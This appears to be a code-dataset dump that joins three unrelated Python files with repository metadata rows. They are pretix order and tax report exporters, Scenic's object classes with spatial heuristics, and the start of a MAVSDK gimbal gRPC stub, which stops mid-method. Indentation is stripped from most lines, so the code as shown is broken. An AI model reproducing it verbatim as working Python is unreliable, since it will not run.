story.append(Paragraph(pgettext('subevent', 'Date: {}').format(subevent), self.get_style()))
story.append(Spacer(1, 5 * mm))
tdata = [
[
_('Product'), _('Canceled'), '', _('Expired'), '', _('Purchased'),
'', '', '', '', ''
],
[
'', '', '', '', '', _('Pending'), '', _('Paid'), '', _('Total'), ''
],
[
'',
_('#'), self.event.currency,
_('#'), self.event.currency,
_('#'), self.event.currency,
_('#'), self.event.currency,
_('#'), self.event.currency,
],
]
items_by_category, total = order_overview(
self.event,
subevent=form_data.get('subevent'),
date_filter=form_data.get('date_axis'),
date_from=form_data.get('date_from'),
date_until=form_data.get('date_until'),
fees=True
)
places = settings.CURRENCY_PLACES.get(self.event.currency, 2)
states = (
('canceled', Order.STATUS_CANCELED),
('expired', Order.STATUS_EXPIRED),
('pending', Order.STATUS_PENDING),
('paid', Order.STATUS_PAID),
('total', None),
)
for tup in items_by_category:
if tup[0]:
tstyledata.append(('FONTNAME', (0, len(tdata)), (-1, len(tdata)), 'OpenSansBd'))
tdata.append([
tup[0].name,
])
for l, s in states:
tdata[-1].append(str(tup[0].num[l][0]))
tdata[-1].append(floatformat(tup[0].num[l][2 if net else 1], places))
for item in tup[1]:
tdata.append([
str(item)
])
for l, s in states:
tdata[-1].append(str(item.num[l][0]))
tdata[-1].append(floatformat(item.num[l][2 if net else 1], places))
if item.has_variations:
for var in item.all_variations:
tdata.append([
" " + str(var),
])
for l, s in states:
tdata[-1].append(str(var.num[l][0]))
tdata[-1].append(floatformat(var.num[l][2 if net else 1], places))
tdata.append([
_("Total"),
])
for l, s in states:
tdata[-1].append(str(total['num'][l][0]))
tdata[-1].append(floatformat(total['num'][l][2 if net else 1], places))
table = Table(tdata, colWidths=colwidths, repeatRows=3)
table.setStyle(TableStyle(tstyledata))
story.append(table)
return story
@property
def export_form_fields(self) -> dict:
f = OverviewFilterForm(event=self.event)
del f.fields['ordering']
return f.fields
class OrderTaxListReportPDF(Report):
name = "ordertaxlist"
identifier = 'ordertaxes'
verbose_name = gettext_lazy('List of orders with taxes (PDF)')
@property
def export_form_fields(self):
return OrderedDict(
[
('status',
forms.MultipleChoiceField(
label=gettext_lazy('Filter by status'),
initial=[Order.STATUS_PAID],
choices=Order.STATUS_CHOICE,
widget=forms.CheckboxSelectMultiple,
required=False
)),
('sort',
forms.ChoiceField(
label=gettext_lazy('Sort by'),
initial='datetime',
choices=(
('datetime', gettext_lazy('Order date')),
('payment_date', gettext_lazy('Payment date')),
),
widget=forms.RadioSelect,
required=False
)),
]
)
@property
def pagesize(self):
from reportlab.lib import pagesizes
return pagesizes.landscape(pagesizes.A4)
def get_story(self, doc, form_data):
from reportlab.lib.units import mm
from reportlab.platypus import Paragraph, Spacer, Table, TableStyle
headlinestyle = self.get_style()
headlinestyle.fontSize = 15
headlinestyle.fontName = 'OpenSansBd'
tz = pytz.timezone(self.event.settings.timezone)
tax_rates = set(
a for a
in OrderFee.objects.filter(
order__event=self.event
).values_list('tax_rate', flat=True).distinct().order_by()
)
tax_rates |= set(
a for a
in OrderPosition.objects.filter(order__event=self.event).filter(
order__status__in=self.form_data['status']
).values_list('tax_rate', flat=True).distinct().order_by()
)
tax_rates = sorted(tax_rates)
# Cols: Order ID | Order date | Status | Payment Date | Total | {gross tax} for t in taxes
colwidths = [a * doc.width for a in [0.12, 0.1, 0.10, 0.12, 0.08]]
if tax_rates:
colwidths += [0.48 / (len(tax_rates) * 2) * doc.width] * (len(tax_rates) * 2)
tstyledata = [
# Alignment
('ALIGN', (0, 0), (3, 0), 'LEFT'), # Headlines
('ALIGN', (4, 0), (-1, 0), 'CENTER'), # Headlines
('ALIGN', (4, 1), (-1, -1), 'RIGHT'), # Money
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
# Fonts
('FONTNAME', (0, 0), (-1, 0), 'OpenSansBd'), # Headlines
('FONTNAME', (0, -1), (-1, -1), 'OpenSansBd'), # Sums
]
for i, rate in enumerate(tax_rates):
tstyledata.append(('SPAN', (5 + 2 * i, 0), (6 + 2 * i, 0)))
story = [
Paragraph(_('Orders by tax rate ({currency})').format(currency=self.event.currency), headlinestyle),
Spacer(1, 5 * mm)
]
tdata = [
[
_('Order code'), _('Order date'), _('Status'), _('Payment date'), _('Order total'),
] + sum(([localize(t) + ' %', ''] for t in tax_rates), []),
[
'', '', '', '', ''
] + sum(([_('Gross'), _('Tax')] for t in tax_rates), []),
]
op_date = OrderPayment.objects.filter(
order=OuterRef('order'),
state__in=(OrderPayment.PAYMENT_STATE_CONFIRMED, OrderPayment.PAYMENT_STATE_REFUNDED),
payment_date__isnull=False
).values('order').annotate(
m=Max('payment_date')
).values(
'm'
).order_by()
qs = OrderPosition.objects.filter(
order__status__in=self.form_data['status'],
order__event=self.event,
).annotate(payment_date=Subquery(op_date, output_field=models.DateTimeField())).values(
'order__code', 'order__datetime', 'payment_date', 'order__total', 'tax_rate', 'order__status',
'order__id'
).annotate(prices=Sum('price'), tax_values=Sum('tax_value')).order_by(
'order__datetime' if self.form_data['sort'] == 'datetime' else 'payment_date',
'order__datetime',
'order__code'
)
fee_sum_cache = {
(o['order__id'], o['tax_rate']): o for o in
OrderFee.objects.values('tax_rate', 'order__id').order_by().annotate(
taxsum=Sum('tax_value'), grosssum=Sum('value')
)
}
last_order_code = None
tax_sums = defaultdict(Decimal)
price_sums = defaultdict(Decimal)
status_labels = dict(Order.STATUS_CHOICE)
for op in qs:
if op['order__code'] != last_order_code:
tdata.append(
[
op['order__code'],
date_format(op['order__datetime'].astimezone(tz), "SHORT_DATE_FORMAT"),
status_labels[op['order__status']],
date_format(op['payment_date'], "SHORT_DATE_FORMAT") if op['payment_date'] else '',
op['order__total']
] + sum((['', ''] for t in tax_rates), []),
)
last_order_code = op['order__code']
for i, rate in enumerate(tax_rates):
odata = fee_sum_cache.get((op['order__id'], rate))
if odata:
tdata[-1][5 + 2 * i] = odata['grosssum'] or Decimal('0.00')
tdata[-1][6 + 2 * i] = odata['taxsum'] or Decimal('0.00')
tax_sums[rate] += odata['taxsum'] or Decimal('0.00')
price_sums[rate] += odata['grosssum'] or Decimal('0.00')
i = tax_rates.index(op['tax_rate'])
tdata[-1][5 + 2 * i] = (tdata[-1][5 + 2 * i] or Decimal('0.00')) + op['prices']
tdata[-1][6 + 2 * i] = (tdata[-1][6 + 2 * i] or Decimal('0.00')) + op['tax_values']
tax_sums[op['tax_rate']] += op['tax_values']
price_sums[op['tax_rate']] += op['prices']
tdata.append(
[
_('Total'), '', '', '', ''
] + sum(([
price_sums.get(t) or Decimal('0.00'),
tax_sums.get(t) or Decimal('0.00')
] for t in tax_rates), []),
)
tdata = [
[
localize(round_decimal(c, self.event.currency))
if isinstance(c, (Decimal, int, float))
else c
for c in row
] for row in tdata
]
table = Table(tdata, colWidths=colwidths, repeatRows=2)
table.setStyle(TableStyle(tstyledata))
story.append(table)
return story
class OrderTaxListReport(ListExporter):
identifier = 'ordertaxeslist'
verbose_name = gettext_lazy('List of orders with taxes')
@property
def export_form_fields(self):
f = super().export_form_fields
f.update(OrderedDict(
[
('status',
forms.MultipleChoiceField(
label=_('Filter by status'),
initial=[Order.STATUS_PAID],
choices=Order.STATUS_CHOICE,
widget=forms.CheckboxSelectMultiple,
required=False
)),
('sort',
forms.ChoiceField(
label=_('Sort by'),
initial='datetime',
choices=(
('datetime', gettext_lazy('Order date')),
('payment_date', gettext_lazy('Payment date')),
),
widget=forms.RadioSelect,
required=False
)),
]
))
return f
def iterate_list(self, form_data):
tz = pytz.timezone(self.event.settings.timezone)
tax_rates = set(
a for a
in OrderFee.objects.filter(
order__event=self.event
).values_list('tax_rate', flat=True).distinct().order_by()
)
tax_rates |= set(
a for a
in OrderPosition.objects.filter(order__event=self.event).filter(
order__status__in=form_data['status']
).values_list('tax_rate', flat=True).distinct().order_by()
)
tax_rates = sorted(tax_rates)
headers = [
_('Order code'), _('Order date'),
_('Company'), _('Name'),
_('Country'), _('VAT ID'), _('Status'), _('Payment date'), _('Order total'),
] + sum(([str(t) + ' % ' + _('Gross'), str(t) + ' % ' + _('Tax')] for t in tax_rates), [])
yield headers
op_date = OrderPayment.objects.filter(
order=OuterRef('order'),
state__in=(OrderPayment.PAYMENT_STATE_CONFIRMED, OrderPayment.PAYMENT_STATE_REFUNDED),
payment_date__isnull=False
).values('order').annotate(
m=Max('payment_date')
).values(
'm'
).order_by()
qs = OrderPosition.objects.filter(
order__status__in=form_data['status'],
order__event=self.event,
).annotate(payment_date=Subquery(op_date, output_field=models.DateTimeField())).values(
'order__code', 'order__datetime', 'payment_date', 'order__total', 'tax_rate', 'order__status',
'order__id', 'order__invoice_address__name_cached', 'order__invoice_address__company',
'order__invoice_address__country', 'order__invoice_address__vat_id'
).annotate(prices=Sum('price'), tax_values=Sum('tax_value')).order_by(
'order__datetime' if form_data['sort'] == 'datetime' else 'payment_date',
'order__datetime',
'order__code'
)
fee_sum_cache = {
(o['order__id'], o['tax_rate']): o for o in
OrderFee.objects.values('tax_rate', 'order__id').order_by().annotate(
taxsum=Sum('tax_value'), grosssum=Sum('value')
)
}
last_order_code = None
tax_sums = defaultdict(Decimal)
price_sums = defaultdict(Decimal)
status_labels = dict(Order.STATUS_CHOICE)
row = None
for op in qs:
if op['order__code'] != last_order_code:
if row:
yield row
row = None
row = [
op['order__code'],
date_format(op['order__datetime'].astimezone(tz), "SHORT_DATE_FORMAT"),
op['order__invoice_address__company'],
op['order__invoice_address__name_cached'],
op['order__invoice_address__country'],
op['order__invoice_address__vat_id'],
status_labels[op['order__status']],
date_format(op['payment_date'], "SHORT_DATE_FORMAT") if op['payment_date'] else '',
round_decimal(op['order__total'], self.event.currency),
] + sum(([Decimal('0.00'), Decimal('0.00')] for t in tax_rates), [])
last_order_code = op['order__code']
for i, rate in enumerate(tax_rates):
odata = fee_sum_cache.get((op['order__id'], rate))
if odata:
row[9 + 2 * i] = odata['grosssum'] or 0
row[10 + 2 * i] = odata['taxsum'] or 0
tax_sums[rate] += odata['taxsum'] or 0
price_sums[rate] += odata['grosssum'] or 0
i = tax_rates.index(op['tax_rate'])
row[9 + 2 * i] = round_decimal(row[9 + 2 * i] + op['prices'], self.event.currency)
row[10 + 2 * i] = round_decimal(row[10 + 2 * i] + op['tax_values'], self.event.currency)
tax_sums[op['tax_rate']] += op['tax_values']
price_sums[op['tax_rate']] += op['prices']
if row:
yield row
yield [
_('Total'), '', '', '', '', '', '', '', ''
] + sum(([
round_decimal(price_sums.get(t) or Decimal('0.00'), self.event.currency),
round_decimal(tax_sums.get(t) or Decimal('0.00'), self.event.currency)
] for t in tax_rates), [])
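# Illustration (not part of pretix): how the per-tax-rate column offsets used above work.
# iterate_list() emits nine fixed columns (indices 0-8) followed by one (gross, tax) pair
# per rate, so rate i lands in columns 9 + 2*i and 10 + 2*i. All values are made up.
def _example_tax_columns():
    tax_rates = [Decimal('0.00'), Decimal('7.00'), Decimal('19.00')]
    row = ['ORDER1', '2021-01-01', 'ACME', 'Jane Doe', 'DE', '', 'Paid', '2021-01-02',
           Decimal('119.00')] + [Decimal('0.00'), Decimal('0.00')] * len(tax_rates)
    i = tax_rates.index(Decimal('19.00'))
    row[9 + 2 * i] = Decimal('119.00')   # gross amount taxed at 19 %
    row[10 + 2 * i] = Decimal('19.00')   # tax amount at 19 %
    return row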
| 39.818781
| 126
| 0.525983
|
3f4ded892f044dd2e8cee91c380489c8cfd8ff0c
| 19,127
|
py
|
Python
|
src/scenic/core/object_types.py
|
ArenBabikian/Scenic
|
5687d9a70c0e6588ee0cda81b4a4a6731bcd2d91
|
[
"BSD-3-Clause"
] | null | null | null |
src/scenic/core/object_types.py
|
ArenBabikian/Scenic
|
5687d9a70c0e6588ee0cda81b4a4a6731bcd2d91
|
[
"BSD-3-Clause"
] | null | null | null |
src/scenic/core/object_types.py
|
ArenBabikian/Scenic
|
5687d9a70c0e6588ee0cda81b4a4a6731bcd2d91
|
[
"BSD-3-Clause"
] | null | null | null |
"""Implementations of the built-in Scenic classes."""
import collections
import math
import random
from scenic.core.distributions import Samplable, needsSampling
from scenic.core.specifiers import Specifier, PropertyDefault
from scenic.core.vectors import Vector
from scenic.core.geometry import (_RotatedRectangle, averageVectors, hypot, min, viewAngleToPoint, distanceToSegment, radialToCartesian)
from scenic.core.regions import CircularRegion, SectorRegion
from scenic.core.type_support import toVector, toHeading, toType
from scenic.core.lazy_eval import needsLazyEvaluation
from scenic.core.utils import DefaultIdentityDict, areEquivalent, cached_property
from scenic.core.errors import RuntimeParseError
## Abstract base class
class _Constructible(Samplable):
"""Abstract base class for Scenic objects.
Scenic objects, which are constructed using specifiers, are implemented
internally as instances of ordinary Python classes. This abstract class
implements the procedure to resolve specifiers and determine values for
the properties of an object, as well as several common methods supported
by objects.
"""
def __init_subclass__(cls):
super().__init_subclass__()
# find all defaults provided by the class or its superclasses
allDefs = collections.defaultdict(list)
for sc in cls.__mro__:
if issubclass(sc, _Constructible) and hasattr(sc, '__annotations__'):
for prop, value in sc.__annotations__.items():
allDefs[prop].append(PropertyDefault.forValue(value))
# resolve conflicting defaults and gather dynamic properties
resolvedDefs = {}
dyns = []
for prop, defs in allDefs.items():
primary, rest = defs[0], defs[1:]
spec = primary.resolveFor(prop, rest)
resolvedDefs[prop] = spec
if any(defn.isDynamic for defn in defs):
dyns.append(prop)
cls._defaults = resolvedDefs
cls._dynamicProperties = tuple(dyns)
@classmethod
def withProperties(cls, props):
assert all(reqProp in props for reqProp in cls._defaults)
assert all(not needsLazyEvaluation(val) for val in props.values())
return cls(_internal=True, **props)
def __init__(self, *args, _internal=False, **kwargs):
if _internal: # Object is being constructed internally; use fast path
assert not args
for prop, value in kwargs.items():
assert not needsLazyEvaluation(value), (prop, value)
object.__setattr__(self, prop, value)
super().__init__(kwargs.values())
self.properties = set(kwargs.keys())
return
# Validate specifiers
name = self.__class__.__name__
specifiers = list(args)
for prop, val in kwargs.items(): # kwargs supported for internal use
specifiers.append(Specifier(prop, val, internal=True))
properties = dict()
optionals = collections.defaultdict(list)
defs = self.__class__._defaults
for spec in specifiers:
assert isinstance(spec, Specifier), (name, spec)
prop = spec.property
if prop in properties:
raise RuntimeParseError(f'property "{prop}" of {name} specified twice')
properties[prop] = spec
for opt in spec.optionals:
if opt in defs: # do not apply optionals for properties this object lacks
optionals[opt].append(spec)
# Decide which optionals to use
optionalsForSpec = collections.defaultdict(set)
for opt, specs in optionals.items():
if opt in properties:
continue # optionals do not override a primary specification
if len(specs) > 1:
raise RuntimeParseError(f'property "{opt}" of {name} specified twice (optionally)')
assert len(specs) == 1
spec = specs[0]
properties[opt] = spec
optionalsForSpec[spec].add(opt)
# Add any default specifiers needed
for prop in defs:
if prop not in properties:
spec = defs[prop]
specifiers.append(spec)
properties[prop] = spec
# Topologically sort specifiers
order = []
seen, done = set(), set()
def dfs(spec):
if spec in done:
return
elif spec in seen:
raise RuntimeParseError(f'specifier for property {spec.property} '
'depends on itself')
seen.add(spec)
for dep in spec.requiredProperties:
child = properties.get(dep)
if child is None:
raise RuntimeParseError(f'property {dep} required by '
f'specifier {spec} is not specified')
else:
dfs(child)
order.append(spec)
done.add(spec)
for spec in specifiers:
dfs(spec)
assert len(order) == len(specifiers)
# Evaluate and apply specifiers
self.properties = set() # will be filled by calls to _specify below
self._evaluated = DefaultIdentityDict() # temporary cache for lazily-evaluated values
for spec in order:
spec.applyTo(self, optionalsForSpec[spec])
del self._evaluated
# Set up dependencies
deps = []
for prop in properties:
assert hasattr(self, prop)
val = getattr(self, prop)
deps.append(val)
super().__init__(deps)
# Possibly register this object
self._register()
def _specify(self, prop, value):
assert prop not in self.properties
# Normalize types of some built-in properties
if prop == 'position':
value = toVector(value, f'"position" of {self} not a vector')
elif prop == 'heading':
value = toHeading(value, f'"heading" of {self} not a heading')
self.properties.add(prop)
object.__setattr__(self, prop, value)
def _register(self):
pass # do nothing by default; may be overridden by subclasses
def sampleGiven(self, value):
return self.withProperties({ prop: value[getattr(self, prop)]
for prop in self.properties })
def allProperties(self):
return { prop: getattr(self, prop) for prop in self.properties }
def copyWith(self, **overrides):
props = self.allProperties()
props.update(overrides)
return self.withProperties(props)
def isEquivalentTo(self, other):
if type(other) is not type(self):
return False
return areEquivalent(self.allProperties(), other.allProperties())
def __str__(self):
if hasattr(self, 'properties') and 'name' in self.properties:
return self.name
else:
return f'unnamed {self.__class__.__name__} ({id(self)})'
def __repr__(self):
if hasattr(self, 'properties'):
allProps = { prop: getattr(self, prop) for prop in self.properties }
else:
allProps = '<under construction>'
return f'{type(self).__name__}({allProps})'
## Mutators
class Mutator:
"""An object controlling how the ``mutate`` statement affects an `Object`.
A `Mutator` can be assigned to the ``mutator`` property of an `Object` to
control the effect of the ``mutate`` statement. When mutation is enabled
for such an object using that statement, the mutator's `appliedTo` method
is called to compute a mutated version.
"""
def appliedTo(self, obj):
"""Return a mutated copy of the object. Implemented by subclasses."""
raise NotImplementedError
class PositionMutator(Mutator):
"""Mutator adding Gaussian noise to ``position``. Used by `Point`.
Attributes:
stddev (float): standard deviation of noise
"""
def __init__(self, stddev):
self.stddev = stddev
def appliedTo(self, obj):
noise = Vector(random.gauss(0, self.stddev), random.gauss(0, self.stddev))
pos = obj.position + noise
return (obj.copyWith(position=pos), True) # allow further mutation
def __eq__(self, other):
if type(other) is not type(self):
return NotImplemented
return (other.stddev == self.stddev)
def __hash__(self):
return hash(self.stddev)
class HeadingMutator(Mutator):
"""Mutator adding Gaussian noise to ``heading``. Used by `OrientedPoint`.
Attributes:
stddev (float): standard deviation of noise
"""
def __init__(self, stddev):
self.stddev = stddev
def appliedTo(self, obj):
noise = random.gauss(0, self.stddev)
h = obj.heading + noise
return (obj.copyWith(heading=h), True) # allow further mutation
def __eq__(self, other):
if type(other) is not type(self):
return NotImplemented
return (other.stddev == self.stddev)
def __hash__(self):
return hash(self.stddev)
## Point
class Point(_Constructible):
"""Implementation of the Scenic base class ``Point``.
The default mutator for `Point` adds Gaussian noise to ``position`` with
a standard deviation given by the ``positionStdDev`` property.
Properties:
position (`Vector`; dynamic): Position of the point. Default value is the origin.
visibleDistance (float): Distance for ``can see`` operator. Default value 50.
width (float): Default value zero (only provided for compatibility with
operators that expect an `Object`).
length (float): Default value zero.
.. note::
If you're looking into Scenic's internals, note that `Point` is actually a
subclass of the internal Python class `_Constructible`.
"""
position: PropertyDefault((), {'dynamic'}, lambda self: Vector(0, 0))
width: 0
length: 0
visibleDistance: 50
mutationEnabled: False
mutator: PropertyDefault({'positionStdDev'}, {'additive'},
lambda self: PositionMutator(self.positionStdDev))
positionStdDev: 1
    # TODO fix this
@property
def visibleRegion(self):
return CircularRegion(self.position, self.visibleDistance)
# @cached_property
@property
def corners(self):
return (self.position,)
def toVector(self) -> Vector:
return self.position
# IMPORTANT
def canSee(self, other) -> bool: # TODO improve approximation?
for corner in other.corners:
if self.visibleRegion.containsPoint(corner):
return True
return False
def canSeeHeuristic(self, other):
minDist = float('inf')
for corner in other.corners:
dist = self.visibleRegion.shortestDistanceTo(corner)
# print(dist)
if dist < minDist:
minDist = dist
return minDist
def containedHeuristic(self, container):
maxDist = 0
for corner in self.corners:
dist = container.distanceTo(corner)
if dist > maxDist:
maxDist = dist
return maxDist
def euclidianDist(self, other):
a = self.position
b = other.position
return hypot(a[0]-b[0], a[1]-b[1])
    # TODO left/right distance is not the same as front/back distance
def distRelHeuristic(self, other, loBd, hiBd):
delta = self.euclidianDist(other)
if delta < loBd:
return loBd - delta
elif hiBd is not None and delta > hiBd:
return delta - hiBd
else:
return 0
def distCloseHeuristic(self, other):
return self.distRelHeuristic(other, 0, 10)
def distMedHeuristic(self, other):
return self.distRelHeuristic(other, 10, 20)
def distFarHeuristic(self, other):
return self.distRelHeuristic(other, 20, 50)
def sampleGiven(self, value):
sample = super().sampleGiven(value)
if self.mutationEnabled:
for mutator in self.mutator:
if mutator is None:
continue
sample, proceed = mutator.appliedTo(sample)
if not proceed:
break
return sample
# Points automatically convert to Vectors when needed
def __getattr__(self, attr):
if hasattr(Vector, attr):
return getattr(self.toVector(), attr)
else:
raise AttributeError(f"'{type(self).__name__}' object has no attribute '{attr}'")
## OrientedPoint
class OrientedPoint(Point):
"""Implementation of the Scenic class ``OrientedPoint``.
The default mutator for `OrientedPoint` adds Gaussian noise to ``heading``
with a standard deviation given by the ``headingStdDev`` property, then
applies the mutator for `Point`.
Properties:
heading (float; dynamic): Heading of the `OrientedPoint`. Default value 0
(North).
viewAngle (float): View cone angle for ``can see`` operator. Default
value :math:`2\\pi`.
"""
heading: PropertyDefault((), {'dynamic'}, lambda self: 0)
viewAngle: math.tau
mutator: PropertyDefault({'headingStdDev'}, {'additive'},
lambda self: HeadingMutator(self.headingStdDev))
headingStdDev: math.radians(5)
# TODO fix this
# @cached_property
@property
def visibleRegion(self):
return SectorRegion(self.position, self.visibleDistance,
self.heading, self.viewAngle)
def relativize(self, vec):
pos = self.relativePosition(vec)
return OrientedPoint(position=pos, heading=self.heading)
def relativePosition(self, vec):
return self.position.offsetRotated(self.heading, vec)
def toHeading(self) -> float:
return self.heading
def posRelHeuristic(self, other, heading, dist, angle):
a = viewAngleToPoint(tuple(other.position), self.position, heading)
# endPoint = radialToCartesian(self.position, dist, heading)
# return distanceToSegment(tuple(other.position), self.position, endPoint)
real_ang = abs(a)
inRange = real_ang - angle < 0
return 0 if inRange else real_ang - angle
def toLeftHeuristic(self, other):
return self.posRelHeuristic(other, self.heading+(math.pi / 2), 20, math.atan(2.5/2))
def toRightHeuristic(self, other):
return self.posRelHeuristic(other, self.heading-(math.pi / 2), 20, math.atan(2.5/2))
def inFrontHeuristic(self, other):
return self.posRelHeuristic(other, self.heading, 50, math.atan(2/5))
def behindHeuristic(self, other):
return self.posRelHeuristic(other, self.heading+math.pi, 50, math.atan(2/5))
## Object
class Object(OrientedPoint, _RotatedRectangle):
"""Implementation of the Scenic class ``Object``.
This is the default base class for Scenic classes.
Properties:
width (float): Width of the object, i.e. extent along its X axis.
Default value 1.
length (float): Length of the object, i.e. extent along its Y axis.
Default value 1.
allowCollisions (bool): Whether the object is allowed to intersect
other objects. Default value ``False``.
requireVisible (bool): Whether the object is required to be visible
from the ``ego`` object. Default value ``True``.
regionContainedIn (`Region` or ``None``): A `Region` the object is
required to be contained in. If ``None``, the object need only be
contained in the scenario's workspace.
cameraOffset (`Vector`): Position of the camera for the ``can see``
operator, relative to the object's ``position``. Default ``0 @ 0``.
speed (float; dynamic): Speed in dynamic simulations. Default value 0.
velocity (`Vector`; *dynamic*): Velocity in dynamic simulations. Default value is
the velocity determined by ``self.speed`` and ``self.heading``.
angularSpeed (float; *dynamic*): Angular speed in dynamic simulations. Default
value 0.
behavior: Behavior for dynamic agents, if any (see :ref:`dynamics`). Default
value ``None``.
"""
width: 1
length: 1
allowCollisions: False
requireVisible: True
regionContainedIn: None
cameraOffset: Vector(0, 0)
velocity: PropertyDefault(('speed', 'heading'), {'dynamic'},
lambda self: Vector(0, self.speed).rotatedBy(self.heading))
speed: PropertyDefault((), {'dynamic'}, lambda self: 0)
angularSpeed: PropertyDefault((), {'dynamic'}, lambda self: 0)
behavior: None
lastActions: None
def __new__(cls, *args, **kwargs):
obj = super().__new__(cls)
# The _dynamicProxy attribute stores a mutable copy of the object used during
# simulations, intercepting all attribute accesses to the original object;
# we set this attribute very early to prevent problems during unpickling.
object.__setattr__(obj, '_dynamicProxy', obj)
return obj
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.hw = hw = self.width / 2
self.hl = hl = self.length / 2
self.radius = hypot(hw, hl) # circumcircle; for collision detection
self.inradius = min(hw, hl) # incircle; for collision detection
self._relations = []
def _specify(self, prop, value):
# Normalize types of some built-in properties
if prop == 'behavior':
import scenic.syntax.veneer as veneer # TODO improve?
value = toType(value, veneer.Behavior,
f'"behavior" of {self} not a behavior')
super()._specify(prop, value)
def _register(self):
import scenic.syntax.veneer as veneer # TODO improve?
veneer.registerObject(self)
def __getattribute__(self, name):
proxy = object.__getattribute__(self, '_dynamicProxy')
return object.__getattribute__(proxy, name)
def __setattr__(self, name, value):
proxy = object.__getattribute__(self, '_dynamicProxy')
object.__setattr__(proxy, name, value)
def __delattr__(self, name):
proxy = object.__getattribute__(self, '_dynamicProxy')
object.__delattr__(proxy, name)
def startDynamicSimulation(self):
"""Hook called at the beginning of each dynamic simulation.
Does nothing by default; provided for objects to do simulator-specific
initialization as needed.
"""
pass
# TODO fix this
# @cached_property
@property
def left(self):
return self.relativize(Vector(-self.hw, 0))
# @cached_property
@property
def right(self):
return self.relativize(Vector(self.hw, 0))
# @cached_property
@property
def front(self):
return self.relativize(Vector(0, self.hl))
# @cached_property
@property
def back(self):
return self.relativize(Vector(0, -self.hl))
# @cached_property
@property
def frontLeft(self):
return self.relativize(Vector(-self.hw, self.hl))
# @cached_property
@property
def frontRight(self):
return self.relativize(Vector(self.hw, self.hl))
# @cached_property
@property
def backLeft(self):
return self.relativize(Vector(-self.hw, -self.hl))
# @cached_property
@property
def backRight(self):
return self.relativize(Vector(self.hw, -self.hl))
# @cached_property
@property
def visibleRegion(self):
camera = self.position.offsetRotated(self.heading, self.cameraOffset)
return SectorRegion(camera, self.visibleDistance, self.heading, self.viewAngle)
# @cached_property
@property
def corners(self):
# IMPORTANT
hw, hl = self.hw, self.hl
return (
self.relativePosition(Vector(hw, hl)),
self.relativePosition(Vector(-hw, hl)),
self.relativePosition(Vector(-hw, -hl)),
self.relativePosition(Vector(hw, -hl))
)
def show(self, workspace, plt, highlight=False):
if needsSampling(self):
raise RuntimeError('tried to show() symbolic Object')
pos = self.position
spos = workspace.scenicToSchematicCoords(pos)
if highlight:
# Circle around object
rad = 1.5 * max(self.width, self.length)
c = plt.Circle(spos, rad, color='g', fill=False)
plt.gca().add_artist(c)
# View cone
ha = self.viewAngle / 2.0
camera = self.position.offsetRotated(self.heading, self.cameraOffset)
cpos = workspace.scenicToSchematicCoords(camera)
for angle in (-ha, ha):
p = camera.offsetRadially(20, self.heading + angle)
edge = [cpos, workspace.scenicToSchematicCoords(p)]
x, y = zip(*edge)
plt.plot(x, y, 'b:')
corners = [workspace.scenicToSchematicCoords(corner) for corner in self.corners]
x, y = zip(*corners)
color = self.color if hasattr(self, 'color') else (1, 0, 0)
plt.fill(x, y, color=color)
frontMid = averageVectors(corners[0], corners[1])
baseTriangle = [frontMid, corners[2], corners[3]]
triangle = [averageVectors(p, spos, weight=0.5) for p in baseTriangle]
x, y = zip(*triangle)
plt.fill(x, y, "w")
plt.plot(x + (x[0],), y + (y[0],), color="k", linewidth=1)
def enableDynamicProxyFor(obj):
object.__setattr__(obj, '_dynamicProxy', obj.copyWith())
def setDynamicProxyFor(obj, proxy):
object.__setattr__(obj, '_dynamicProxy', proxy)
def disableDynamicProxyFor(obj):
object.__setattr__(obj, '_dynamicProxy', obj)
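# Sketch (not part of this module): how a simulator loop is expected to use the proxy
# helpers above. enableDynamicProxyFor installs a mutable copy, attribute writes then go
# to that copy, and disableDynamicProxyFor restores the originally sampled values.
def _example_proxy_roundtrip(obj):
    enableDynamicProxyFor(obj)
    obj.speed = 5.0                 # mutates only the proxy copy
    speed_during_simulation = obj.speed
    disableDynamicProxyFor(obj)
    return speed_during_simulation, obj.speed  # the second value is the sampled one again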
| 31.100813
| 136
| 0.71935
|
4c1285b1344a85d5d8d85d224f5331988b499350
| 6,458
|
py
|
Python
|
mavsdk/gimbal_pb2_grpc.py
|
deodates-dev/UAV-MAVSDK-Python
|
4743657304ec9c3cac83b290b80b563fea595a8d
|
[
"BSD-3-Clause"
] | 1
|
2020-07-11T10:02:28.000Z
|
2020-07-11T10:02:28.000Z
|
mavsdk/gimbal_pb2_grpc.py
|
deodates-dev/UAV-MAVSDK-Python
|
4743657304ec9c3cac83b290b80b563fea595a8d
|
[
"BSD-3-Clause"
] | null | null | null |
mavsdk/gimbal_pb2_grpc.py
|
deodates-dev/UAV-MAVSDK-Python
|
4743657304ec9c3cac83b290b80b563fea595a8d
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from . import gimbal_pb2 as gimbal_dot_gimbal__pb2
class GimbalServiceStub(object):
"""Provide control over a gimbal.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.SetPitchAndYaw = channel.unary_unary(
'/mavsdk.rpc.gimbal.GimbalService/SetPitchAndYaw',
request_serializer=gimbal_dot_gimbal__pb2.SetPitchAndYawRequest.SerializeToString,
response_deserializer=gimbal_dot_gimbal__pb2.SetPitchAndYawResponse.FromString,
)
self.SetMode = channel.unary_unary(
'/mavsdk.rpc.gimbal.GimbalService/SetMode',
request_serializer=gimbal_dot_gimbal__pb2.SetModeRequest.SerializeToString,
response_deserializer=gimbal_dot_gimbal__pb2.SetModeResponse.FromString,
)
self.SetRoiLocation = channel.unary_unary(
'/mavsdk.rpc.gimbal.GimbalService/SetRoiLocation',
request_serializer=gimbal_dot_gimbal__pb2.SetRoiLocationRequest.SerializeToString,
response_deserializer=gimbal_dot_gimbal__pb2.SetRoiLocationResponse.FromString,
)
class GimbalServiceServicer(object):
"""Provide control over a gimbal.
"""
def SetPitchAndYaw(self, request, context):
"""
Set gimbal pitch and yaw angles.
This sets the desired pitch and yaw angles of a gimbal.
Will return when the command is accepted, however, it might
take the gimbal longer to actually be set to the new angles.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetMode(self, request, context):
"""
Set gimbal mode.
This sets the desired yaw mode of a gimbal.
Will return when the command is accepted. However, it might
take the gimbal longer to actually be set to the new angles.
"""
